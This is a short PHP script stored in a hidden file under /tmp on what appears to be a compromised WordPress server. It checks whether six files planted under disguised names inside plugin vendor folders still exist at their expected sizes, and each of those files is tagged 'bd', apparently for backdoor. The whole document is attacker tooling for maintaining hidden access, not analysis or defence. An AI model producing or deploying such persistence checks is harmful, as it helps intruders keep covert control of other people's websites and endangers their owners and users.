File: //tmp/.requests
<?php $r = '/home/makefitmeserver/public_html'; $x = ["/demo/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V14/Errors/ResourceCountLimitExceededErrorEnum/groups.php"=>"bd@@1267202@@869",
"/demo1/demo/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V14/Errors/KeywordPlanAdGroupErrorEnum/sitemap.php"=>"bd@@1266473@@950",
"/demo1/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V14/Errors/FunctionParsingErrorEnum/imageset.php"=>"bd@@1266788@@940",
"/wp-content/plugins/contact-1771601088/custom-file-3-1771601089.php"=>"bd@@1259913@@1106",
"/demo1/wp-content/plugins/google-listings-and-ads/vendor/googleads/google-ads-php/src/Google/Ads/GoogleAds/V14/Errors/ConversionGoalCampaignConfigErrorEnum/schema.php"=>"bd@@1266603@@1042",
"/demo1/wp-content/plugins/google-listings-and-ads/vendor/google/gax/metadata/Google/ApiCore/Tests/Unit/LICENSE.php"=>"bd@@1267457@@884"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');